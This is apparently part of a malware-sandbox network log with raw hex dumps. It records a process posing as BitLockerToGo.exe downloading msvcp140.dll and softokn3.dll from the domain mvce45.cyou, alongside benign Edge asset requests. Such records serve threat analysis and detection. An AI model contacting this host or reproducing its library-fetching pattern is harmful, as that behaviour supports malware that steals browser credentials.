                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:46 UTC2229INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 08 4a 49 44 41 54 78 01 ed 98 6d 88 5c 57 19 c7 9f e7 dc 7b 37 89 49 9a dd 6c 5e d6 96 c0 c4 36 a1 d5 2f 49 a1 92 22 ea 06 ac a4 41 21 05 41 2a e8 ee 16 a4 82 e0 26 62 a5 b5 92 99 f1 8b 2f 68 b3 fd 92 16 ad 64 fb 29 16 62 53 6d 68 17 15 b2 a2 ed 07 b1 6c a8 95 d6 97 74 36 a9 35 69 d2 90 dd 6d bb 9b 99 7b ce 79 fc 3f e7 dc d9 8d 99 24 b3 2f f9 d8 03 77 9e 7b ce dc b9 e7 77 ff cf cb 39 77 88 3e 6c 4b 6b 4c 37 a8 f5 ee 1d 2b a5 44 25 c2 47 9a d2 f8 c8 8f b6 8f d3 0d 68 4b 06 dc f1 8d df f7 ae cc ba cb 6c a8
                                                                                                                                                                                                                                                                                                                  Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaJIDATxm\W{7Il^6/I"A!A*&b/hd)bSmhlt65im{y?$/w{w9w>lKkL7+D%GhKl


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  50192.168.2.84982849.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:47 UTC238OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:48 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:47 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                  Content-Length: 450024
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Thursday, 21-Nov-2024 14:48:47 GMT
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:48 UTC16122INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:48 UTC16384INData Raw: 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d
                                                                                                                                                                                                                                                                                                                  Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:48 UTC16384INData Raw: 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff
                                                                                                                                                                                                                                                                                                                  Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:48 UTC16384INData Raw: d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45
                                                                                                                                                                                                                                                                                                                  Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]E
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:48 UTC16384INData Raw: 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b
                                                                                                                                                                                                                                                                                                                  Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:48 UTC16384INData Raw: c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc
                                                                                                                                                                                                                                                                                                                  Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:48 UTC16384INData Raw: 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01
                                                                                                                                                                                                                                                                                                                  Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:48 UTC16384INData Raw: 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8
                                                                                                                                                                                                                                                                                                                  Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:48 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c
                                                                                                                                                                                                                                                                                                                  Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:48 UTC16384INData Raw: e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83
                                                                                                                                                                                                                                                                                                                  Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  51192.168.2.84982613.107.246.404431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:47 UTC425OUTGET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:48 UTC523INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:48 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                                                                                                  Content-Length: 1154
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Wed, 25 Oct 2023 19:48:30 GMT
                                                                                                                                                                                                                                                                                                                  ETag: 0x8DBD5935D5B3965
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: 559dc2ba-701e-0027-3824-3cf24e000000
                                                                                                                                                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                  x-azure-ref: 20241121T144847Z-178bfbc474bkvpdnhC1NYCuu2w00000001k000000000t4k9
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                  x-fd-int-roxy-purgeid: 69316365
                                                                                                                                                                                                                                                                                                                  X-Cache: TCP_MISS
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:48 UTC1154INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 04 17 49 44 41 54 78 01 ed 97 cf 6f db 64 18 c7 bf 76 6a ea 34 69 e3 26 4b d4 b4 30 d2 f1 ab 4c 9a 96 c1 6e ed a1 30 0e 5c 10 4c b0 d3 0e ed 05 c1 05 35 3d ec 00 97 66 ff 41 72 43 02 a9 1a bb 70 03 c4 0d 6d 62 48 4c e2 f7 3a 0a 62 17 56 6b ab d6 aa cd 1a 37 4d 66 c7 89 fd ee 7d 9d 25 6b 1b 27 b1 1b 57 bd e4 23 39 f1 ef 7e fa 3c ef f3 bc 6f 80 1e 3d 8e 16 ce e9 8d c2 87 3f 24 4d 42 7e 04 88 04 2f e1 20 13 82 ac f9 e5 db 19 bb cb 3c 1c 62 10 73 d1 73 39 06 41 82 03 b7 80 d9 6f 6c df ed 38 82 13 5f 6f 10 b8
                                                                                                                                                                                                                                                                                                                  Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxodvj4i&K0Ln0\L5=fArCpmbHL:bVk7Mf}%k'W#9~<o=?$MB~/ <bss9Aol8_o


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  52192.168.2.84982713.107.246.404431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:47 UTC431OUTGET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:48 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:48 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                                                                                                  Content-Length: 1468
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Fri, 03 Nov 2023 21:43:14 GMT
                                                                                                                                                                                                                                                                                                                  ETag: 0x8DBDCB5E23DFC43
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: 559dc2d1-701e-0027-4c24-3cf24e000000
                                                                                                                                                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                  x-azure-ref: 20241121T144847Z-178bfbc474bfw4gbhC1NYCunf400000001pg0000000087w0
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                  X-Cache: TCP_MISS
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:48 UTC1468INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 51 49 44 41 54 78 01 ed 97 4b 6c 54 55 18 c7 ff e7 4e 19 62 da e0 b0 a1 01 03 5c 82 51 7c 52 16 1a 6d 6b 42 57 c4 c7 c2 2e 8c 26 24 46 62 44 17 26 b4 04 62 5c a0 ad 1a 63 dc c8 82 85 89 26 b4 09 68 89 1a a7 18 79 24 1a c6 05 75 41 02 17 19 23 46 03 13 10 4a 35 c8 50 fa 9a b9 f7 9c cf ef 3c ee 74 a6 96 76 da a6 2b e6 4b 4f ef cc b9 e7 9e ef 77 ff df e3 de 01 6a 56 b3 9a d5 ec ce 36 81 45 b6 cd 67 28 85 89 89 14 22 f8 20 e9 4b 0f 29 41 22 25 3c ac 85 42 8a a4 f2 a9 a8 52 8d e1 c5 d4 d5 70 75 3e 49 de a6
                                                                                                                                                                                                                                                                                                                  Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaQIDATxKlTUNb\Q|RmkBW.&$FbD&b\c&hy$uA#FJ5P<tv+KOwjV6Eg(" K)A"%<BRpu>I


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  53192.168.2.84982949.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:51 UTC238OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:51 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:51 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                  Content-Length: 257872
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Thursday, 21-Nov-2024 14:48:51 GMT
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:51 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:51 UTC16384INData Raw: 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89
